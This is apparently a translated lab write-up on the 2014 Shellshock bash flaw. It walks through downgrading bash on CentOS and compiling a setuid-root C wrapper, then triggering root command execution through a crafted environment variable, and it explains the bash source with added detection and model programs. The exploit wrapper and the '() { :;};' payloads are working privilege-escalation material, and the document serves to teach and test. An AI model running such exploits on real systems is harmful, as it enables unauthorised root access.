0x00
Today is supposed to be a day for resting and playing LoL, but my hard-working roommate has to write a Python-like thing. All right, tonight I'll study the vulnerability that appeared in 2014 and that our own product protects against: Shellshock.
This is a vulnerability in the Bash shell (CVE-2014-6271). A function definition passed in through an environment variable can carry extra commands after the function body, and an unpatched bash runs them when it starts, which gives an attacker arbitrary command execution. Unpatched Bash releases up to 4.3 are affected; this lab uses an unpatched 4.1 build.
Lab environment: CentOS 6.7
Experiment purpose: obtain root privileges
0x01
First check your own bash version (bash --version) and whether it is still vulnerable. The bash packaged by the distribution reports version 4.1.x but has been patched for Shellshock, so if your bash is not vulnerable, replace it with an unpatched bash 4.1 built from source as follows:
# wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
# tar xf bash-4.1.tar.gz
# cd bash-4.1
# ./configure
# make && make install
# rm /bin/bash
# ln -s /usr/local/bin/bash /bin/bash
Now run bash --version to confirm that the version has changed. Take a snapshot (image) of the machine before doing this: between the rm and the ln there is no /bin/bash at all, and if anything goes wrong in that window the system's default shell is gone.
0x02
Detect the vulnerability
Run the detection test: if the output contains "vulnerable", the vulnerability is present; otherwise it is not.
Then make /bin/sh point to /bin/bash, because system() in the exploit below runs its command through /bin/sh, and the trigger only works if that shell is the vulnerable bash:
$ sudo ln -sf /bin/bash /bin/sh
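The detection test itself, as an added example that is not part of the original write-up: a C program that sets the standard probe variable x='() { :;}; echo vulnerable', starts the shell named on the command line with a harmless command, and reports whether the trailing echo ran. Only an unpatched bash prints "vulnerable"; a patched bash, or a non-bash /bin/sh, prints only the test line. The program name shellshock_check and the default shell name "bash" are this example's own choices.

```c
/* shellshock_check.c: run the standard Shellshock probe from C.
   Added example, not code from the original page. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns 1 if the shell ran the trailing "echo vulnerable" (Shellshock),
   0 if it did not (patched bash, or not bash at all),
   -1 if the probe could not be started. */
int shellshock_check(const char *shell_path)
{
    char cmd[512];
    char line[256];
    int vulnerable = 0;
    FILE *fp;

    /* The probe: a no-op function body followed by a command that should
       never run if the shell only imports the function definition. The
       child shell inherits this variable through the environment. */
    if (setenv("x", "() { :;}; echo vulnerable", 1) != 0)
        return -1;

    /* Start the shell under test with an innocuous command; merge stderr
       so an error from a missing shell is read (and ignored) as well. */
    snprintf(cmd, sizeof cmd, "%s -c 'echo this is a test' 2>&1", shell_path);
    fp = popen(cmd, "r");
    if (!fp) {
        unsetenv("x");
        return -1;
    }
    while (fgets(line, sizeof line, fp)) {
        if (strstr(line, "vulnerable"))
            vulnerable = 1;
    }
    pclose(fp);
    unsetenv("x");
    return vulnerable;
}

int main(int argc, char **argv)
{
    const char *shell = argc > 1 ? argv[1] : "bash";   /* default is an assumption */
    int r = shellshock_check(shell);
    if (r < 0) {
        perror("popen");
        return 2;
    }
    printf("%s: %s\n", shell, r ? "vulnerable" : "not vulnerable");
    return r ? 1 : 0;
}
```

Run it as ./shellshock_check /bin/bash on the lab box after the downgrade in 0x01 and again after 0x02 with /bin/sh, which should now give the same answer since /bin/sh is a link to bash.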
0x03
Install gcc
# yum -y install gcc gcc-c++ kernel-devel
Then write the exploit code:
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), geteuid() */

int main(void)
{
    /* Make the real UID equal to the effective UID. When this binary is
       setuid root, the bash started below then sees uid == euid, keeps
       root and still imports functions from the environment (see 0x05). */
    setuid(geteuid());
    /* system() runs the command through /bin/sh -c, which is now bash */
    system("/bin/ls -l");
    return 0;
}
Save it as xxx.c and compile it with gcc. For the attack to yield root, the resulting binary has to be setuid root (owned by root with the setuid bit set); that is the privileged target this lab simulates. The lines that follow the compile step in the original are wrong; disregard them.
0x04
Attack
Start the setuid binary with an environment variable whose value is a function definition followed by an extra command, as described in 0x05. Its system() call starts /bin/sh, which is now the vulnerable bash; bash imports the variable and runs the trailing command with root privileges.
Root obtained.
0x05
Simple explanation of the principle
First, bash supports user-defined functions: once a function is defined, it is called by its name alone.
e.g.
$ foo() { echo bar; }
$ foo
> bar
When such a function is exported (export -f foo), child processes receive it as an environment variable whose name is the function name and whose value is the definition:
key=foo
value=() { echo bar; }
From that we can construct the detection payload:
$ export foo='() { :;}; echo hello'
$ bash
> hello
The environment variable is now
key=foo
value=() { :;}; echo hello
Clearly, bash reads the environment variables at startup, and when a new bash is started, the statements appended after the function body are executed.
Remember the setuid(geteuid()) in the .c file: it makes the real UID equal to the effective UID.
Let's look at the simplified bash source (variables.c):
void initialize_shell_variables (char **env, int privmode)
{
    /* loop through all environment variables */
    for (string_index = 0; string = env[string_index++]; ) {
        /* ... */
        /* If exported function, define it now. */
        /* Don't import functions from the environment in privileged mode. */
        if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4)) {
            [...]
            /* This is where Shellshock happens: the whole value, the function
               definition plus whatever commands follow it, is handed to the
               parser and executed */
            parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
            [...]
        }
    }
}
The condition above is what separates the two cases. privmode is privileged mode; it is set when the real UID and the effective UID differ (or when bash is started with -p). A setuid-root binary that called system() without first doing setuid(geteuid()) would start bash with uid != euid, so privmode would be 1, no functions would be imported, and bash would drop to the real UID anyway. After setuid(geteuid()) both UIDs are 0, privmode is 0, and the trailing commands of the payload run as root.
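To make the condition above and the effect of setuid(geteuid()) concrete, here is a small C model of the import decision and of what the parser is handed. This is an added example, not bash source: privmode_for() reduces privmode to "real uid differs from effective uid" (the -p flag and the group ids are left out), end_of_function_body() is a brace counter that ignores quoting, and patched_bash_accepts() approximates the fix by refusing any value that has text after the function body (the real fix restricted parse_and_execute to a single function definition, and later bash versions moved function exports to BASH_FUNC_name%% variables). The uid pairs 1000/0 and 0/0 are constructed sample values standing for a setuid-root binary before and after setuid(geteuid()).

```c
/* shellshock_model.c: toy model of the bash 4.1 environment-function
   import in initialize_shell_variables(). Added example, not bash code. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* getuid, geteuid */

/* Mirrors STREQN ("() {", string, 4): a variable is treated as an
   exported function only if its value starts with "() {". */
int looks_like_function_export(const char *value)
{
    return strncmp(value, "() {", 4) == 0;
}

/* Simplified privmode: set when real and effective uid differ.
   (Real bash also sets it for -p and for mismatched group ids.) */
int privmode_for(unsigned real_uid, unsigned eff_uid)
{
    return real_uid != eff_uid;
}

/* The decision taken by the vulnerable loop: hand the value to
   parse_and_execute iff not privmode, not read-only mode, and the
   value carries the function prefix. */
int vulnerable_bash_imports(unsigned real_uid, unsigned eff_uid,
                            int read_but_dont_execute, const char *value)
{
    return privmode_for(real_uid, eff_uid) == 0
        && read_but_dont_execute == 0
        && looks_like_function_export(value);
}

/* Find the '}' that closes the function body, tracking nesting, and
   return a pointer just past it; NULL if the braces never balance.
   Quoting inside the body is ignored in this toy. */
const char *end_of_function_body(const char *value)
{
    const char *p = strchr(value, '{');
    int depth = 0;
    if (!p)
        return NULL;
    for (; *p; p++) {
        if (*p == '{')
            depth++;
        else if (*p == '}' && --depth == 0)
            return p + 1;
    }
    return NULL;
}

/* What bash 4.1 executed in addition to defining the function: everything
   after the body. Empty for a benign export, the injected commands for a
   Shellshock payload. Leading ';' and spaces are skipped for readability. */
const char *trailing_commands(const char *value)
{
    const char *rest = end_of_function_body(value);
    if (!rest)
        return "";
    while (*rest == ';' || *rest == ' ')
        rest++;
    return rest;
}

/* Approximation of the patched behaviour: only a bare function
   definition with nothing after its body is accepted. */
int patched_bash_accepts(const char *value)
{
    return looks_like_function_export(value) && *trailing_commands(value) == '\0';
}

int main(void)
{
    const char *benign  = "() { echo bar; }";       /* exported function */
    const char *payload = "() { :;}; echo hello";   /* probe from 0x05 */
    unsigned ruid = (unsigned)getuid(), euid = (unsigned)geteuid();

    printf("this process: real uid %u, effective uid %u, privmode=%d\n",
           ruid, euid, privmode_for(ruid, euid));
    printf("benign export, trailing commands: '%s'\n", trailing_commands(benign));
    printf("probe, trailing commands:         '%s'\n", trailing_commands(payload));
    /* setuid-root binary, constructed uids: before and after setuid(geteuid()) */
    printf("import with uid 1000 / euid 0 (no setuid call): %d\n",
           vulnerable_bash_imports(1000, 0, 0, payload));
    printf("import with uid 0 / euid 0 (after setuid(geteuid())): %d\n",
           vulnerable_bash_imports(0, 0, 0, payload));
    printf("patched bash accepts probe: %d\n", patched_bash_accepts(payload));
    return 0;
}
```

The two vulnerable_bash_imports() calls are the whole point of the setuid(geteuid()) line in xxx.c: with uid 1000 and euid 0 the model refuses the import, exactly as bash refuses it in privileged mode, and only with both ids equal does the payload reach the parser.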